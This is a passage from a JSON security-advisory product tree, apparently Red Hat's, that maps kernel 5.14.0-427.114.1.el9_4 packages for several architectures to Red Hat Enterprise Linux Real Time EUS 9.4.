"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
